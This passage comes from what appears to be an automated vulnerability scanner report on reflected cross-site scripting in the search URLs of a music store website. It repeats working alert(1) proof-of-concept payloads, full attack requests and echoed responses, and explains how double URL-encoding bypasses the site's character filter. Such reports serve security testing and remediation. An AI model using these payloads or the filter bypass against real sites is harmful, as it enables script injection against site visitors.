GET /search/query/Horsepower%20Productions2e734%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e1c9db3a996&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:40:35 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=lcid431p60jdufilkht5r2l9l3; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:40:35 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=470678726; expires=Sun, 09-Jan-2011 02:40:35 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=544802520; expires=Sun, 09-Jan-2011 02:40:35 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 34727

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<input type="hidden" name="query" value="Horsepower Productions2e734"><script>alert(1)</script>1c9db3a996" />
...[SNIP]...

1.149. http://www.insound.com/search/query/How%20to%20Dress%20Well&from=47597/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/How%20to%20Dress%20Well&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload da4c9%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e8555fcb64e9 was submitted in the REST URL parameter 3. This input was echoed as da4c9"><script>alert(1)</script>8555fcb64e9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/How%20to%20Dress%20Wellda4c9%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e8555fcb64e9&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:37:17 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=cq3sd721u9jrkhvc5i7cq55up3; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:37:17 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=204523635; expires=Sun, 09-Jan-2011 02:37:17 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=175718969; expires=Sun, 09-Jan-2011 02:37:17 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 38430

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<input type="hidden" name="query" value="How to Dress Wellda4c9"><script>alert(1)</script>8555fcb64e9" />
...[SNIP]...

1.150. http://www.insound.com/search/query/How%20to%20Dress%20Well&from=47597/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/How%20to%20Dress%20Well&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as text between TITLE tags. The payload 4009d%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253efdf91d36c49 was submitted in the REST URL parameter 3. This input was echoed as 4009d</title><script>alert(1)</script>fdf91d36c49 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/How%20to%20Dress%20Well4009d%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253efdf91d36c49&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:37:24 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=9969hhfle9jcu1ni7noog95hi2; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:37:24 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=549254036; expires=Sun, 09-Jan-2011 02:37:24 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=301863147; expires=Sun, 09-Jan-2011 02:37:24 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 38510

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<title>How to Dress Well4009d</title><script>alert(1)</script>fdf91d36c49</title>
...[SNIP]...

1.151. http://www.insound.com/search/query/J%20Mascis&from=47597/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/J%20Mascis&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 28bdc%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e0dd43e04a81 was submitted in the REST URL parameter 3. This input was echoed as 28bdc"><script>alert(1)</script>0dd43e04a81 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/J%20Mascis28bdc%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e0dd43e04a81&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:37:29 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=4mu5lqis0d138b94suh6s3t2o2; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:37:29 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=340898991; expires=Sun, 09-Jan-2011 02:37:29 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=529060621; expires=Sun, 09-Jan-2011 02:37:29 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 37324

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<input type="hidden" name="query" value="J Mascis28bdc"><script>alert(1)</script>0dd43e04a81" />
...[SNIP]...

1.152. http://www.insound.com/search/query/J%20Mascis&from=47597/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/J%20Mascis&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as text between TITLE tags. The payload 75c6a%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ee139c9dfaec was submitted in the REST URL parameter 3. This input was echoed as 75c6a</title><script>alert(1)</script>e139c9dfaec in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/J%20Mascis75c6a%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ee139c9dfaec&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:37:35 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=dg6lq0r0mlg63comojmom3c3a2; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:37:35 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=220202153; expires=Sun, 09-Jan-2011 02:37:35 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=91769978; expires=Sun, 09-Jan-2011 02:37:35 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 37404

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<title>J Mascis75c6a</title><script>alert(1)</script>e139c9dfaec</title>
...[SNIP]...

1.153. http://www.insound.com/search/query/J.%20Cole&from=47597/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/J.%20Cole&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 31451%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e0b83cff01bc was submitted in the REST URL parameter 3. This input was echoed as 31451"><script>alert(1)</script>0b83cff01bc in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/J.%20Cole31451%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e0b83cff01bc&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:40:08 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=8vp5dbl4i17f8mi2pj85nk8763; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:40:08 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=299089229; expires=Sun, 09-Jan-2011 02:40:08 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=557180658; expires=Sun, 09-Jan-2011 02:40:08 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 37313

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<input type="hidden" name="query" value="J. Cole31451"><script>alert(1)</script>0b83cff01bc" />
...[SNIP]...

1.154. http://www.insound.com/search/query/J.%20Cole&from=47597/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/J.%20Cole&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as text between TITLE tags. The payload 716c6%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e5e23fb958d2 was submitted in the REST URL parameter 3. This input was echoed as 716c6</title><script>alert(1)</script>5e23fb958d2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/J.%20Cole716c6%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e5e23fb958d2&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:40:16 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=42d2nmofrhktl9vauf0oik97e5; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:40:16 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=10890112; expires=Sun, 09-Jan-2011 02:40:16 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=456705785; expires=Sun, 09-Jan-2011 02:40:16 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 37393

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<title>J. Cole716c6</title><script>alert(1)</script>5e23fb958d2</title>
...[SNIP]...

1.155. http://www.insound.com/search/query/Jana%20Hunter&from=47597/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Jana%20Hunter&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as text between TITLE tags. The payload e67c8%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eaad4d42f534 was submitted in the REST URL parameter 3. This input was echoed as e67c8</title><script>alert(1)</script>aad4d42f534 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Jana%20Huntere67c8%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eaad4d42f534&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:37:45 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=rj87r3p0hfv02ucvg93fs01sr5; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:37:45 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=20803814; expires=Sun, 09-Jan-2011 02:37:45 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=478548248; expires=Sun, 09-Jan-2011 02:37:45 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 33264

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<title>Jana Huntere67c8</title><script>alert(1)</script>aad4d42f534</title>
...[SNIP]...

1.156. http://www.insound.com/search/query/Jana%20Hunter&from=47597/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Jana%20Hunter&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 99918%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e284866e9e45 was submitted in the REST URL parameter 3. This input was echoed as 99918"><script>alert(1)</script>284866e9e45 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Jana%20Hunter99918%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e284866e9e45&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:37:39 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=385355dritsklf27gqbeiu8tn2; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:37:39 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=352752951; expires=Sun, 09-Jan-2011 02:37:39 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=194276469; expires=Sun, 09-Jan-2011 02:37:39 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 33248

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<input type="hidden" name="query" value="Jana Hunter99918"><script>alert(1)</script>284866e9e45" />
...[SNIP]...

1.157. http://www.insound.com/search/query/John%20Talabot&from=47597/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/John%20Talabot&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ccf4f%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e478380776a0 was submitted in the REST URL parameter 3. This input was echoed as ccf4f"><script>alert(1)</script>478380776a0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/John%20Talabotccf4f%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e478380776a0&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:40:58 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=1jdrb0ti8kn6g2kebmorhsrv03; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:40:58 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=127366689; expires=Sun, 09-Jan-2011 02:40:58 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=371923705; expires=Sun, 09-Jan-2011 02:40:58 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 37834

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<input type="hidden" name="query" value="John Talabotccf4f"><script>alert(1)</script>478380776a0" />
...[SNIP]...

1.158. http://www.insound.com/search/query/John%20Talabot&from=47597/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/John%20Talabot&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as text between TITLE tags. The payload d4820%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e1dd42d753ba was submitted in the REST URL parameter 3. This input was echoed as d4820</title><script>alert(1)</script>1dd42d753ba in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/John%20Talabotd4820%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e1dd42d753ba&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:41:05 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=r22dgslscj0c9ge9pkga6q94l0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:41:05 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=472193018; expires=Sun, 09-Jan-2011 02:41:05 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=476381303; expires=Sun, 09-Jan-2011 02:41:05 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 37914

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<title>John Talabotd4820</title><script>alert(1)</script>1dd42d753ba</title>
...[SNIP]...

1.159. http://www.insound.com/search/query/Julio%20Bashmore&from=47597/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Julio%20Bashmore&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as text between TITLE tags. The payload b8107%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ef2414204422 was submitted in the REST URL parameter 3. This input was echoed as b8107</title><script>alert(1)</script>f2414204422 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /search/query/Julio%20Bashmoreb8107%253c%252ftitle%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ef2414204422&from=47597/ HTTP/1.1
Host: www.insound.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 10 Dec 2010 02:41:06 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=udk2kat5t69s3dnfhj2dderns6; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: arefer=47597; expires=Sun, 09-Jan-2011 02:41:06 GMT; path=/; domain=.insound.com
Set-Cookie: CFID=91970399; expires=Sun, 09-Jan-2011 02:41:06 GMT; path=/; domain=.insound.com
Set-Cookie: CFTOKEN=9726414; expires=Sun, 09-Jan-2011 02:41:06 GMT; path=/; domain=.insound.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 19030

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en-US" xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link re
...[SNIP]...
<title>Julio Bashmoreb8107</title><script>alert(1)</script>f2414204422</title>
...[SNIP]...

1.160. http://www.insound.com/search/query/Julio%20Bashmore&from=47597/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insound.com
Path:   /search/query/Julio%20Bashmore&from=47597/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a2c3a%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253efc9d6a819a5 was submitted in the REST URL parameter 3. This input was echoed as a2c3a"><script>alert(1)</script>fc9d6a819a5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

